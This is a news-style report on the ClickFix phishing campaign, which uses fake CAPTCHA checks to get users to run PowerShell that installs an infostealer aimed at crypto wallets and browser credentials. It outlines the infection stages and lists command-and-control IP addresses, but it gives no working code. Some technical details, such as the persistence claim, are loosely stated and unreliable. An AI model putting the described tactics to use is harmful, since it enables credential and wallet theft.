New ClickFix Attack Exposes Crypto Wallets and 25+ Browsers to Infostealer Malware

Post Views: 3

Cybersecurity Researchers Uncover Sophisticated Phishing Campaign

Cybersecurity researchers have uncovered a sophisticated phishing campaign leveraging fake CAPTCHA challenges to distribute a potent infostealer malware.

The ClickFix Campaign

The operation, dubbed ClickFix, has been found to target over 25 web browsers, cryptocurrency wallets such as MetaMask, and gaming accounts.

Attack Tactics

The attackers’ tactics involve deceiving users into executing malicious PowerShell commands, ultimately compromising their systems.

“The ClickFix campaign is an evolution of a previous attack that targeted restaurant bookings in early 2025.”

Multi-Stage Infection Process

This latest iteration employs a multi-stage infection process, which begins when a user visits a compromised website and is presented with a fake CAPTCHA verification step.

Unbeknownst to the user, this interaction triggers a command on their machine to read clipboard data using the CClipDataObject::GetData function.

Command and Control Server

Further analysis revealed that the attackers utilize the Windows tool PowerShell to reach out to a command and control (C2) server located at 91.92.240.219.

This C2 server is used to download additional malware components, including a tool called Donut, which enables the attackers to evade detection.

Malware Components

The Donut software creates a file named cptch.bin, also known as shellcode, which allows the malware to reside in the computer’s memory, making it difficult to detect using standard security scans.

Primary Objective

The primary objective of the ClickFix infostealer is to exfiltrate sensitive data from compromised systems.

The malware is designed to target cryptocurrency wallets, including MetaMask, Exodus, and Trust Wallet, as well as saved login credentials from over 25 web browsers, including Chrome, Edge, and Opera GX.

Additionally, the malware targets Steam accounts, VPN settings, and FTP details used for website management.

Detection and Persistence

Researchers noted that the attackers made a critical mistake by using a variable name, $finalPayload, which triggered a detection by Microsoft Defender, flagging it as Behavior:Win32/SuspClickFix.C.

However, the attackers continue to host various versions of the malware across different IP addresses, including 94.154.35.115 and 178.16.53.70.

To maintain persistence, the attackers modify the RunMRU registry keys, ensuring the malware restarts every time the system boots.

Conclusion

This sophisticated phishing campaign highlights the importance of exercising caution when interacting with online security checks, as even familiar verification steps can be exploited by attackers.

The ClickFix operation serves as a reminder that cybersecurity threats are constantly evolving, and users must remain vigilant to protect themselves against such attacks.

By understanding the tactics, techniques, and procedures (TTPs) employed by attackers, individuals and organizations can better defend themselves against these types of threats.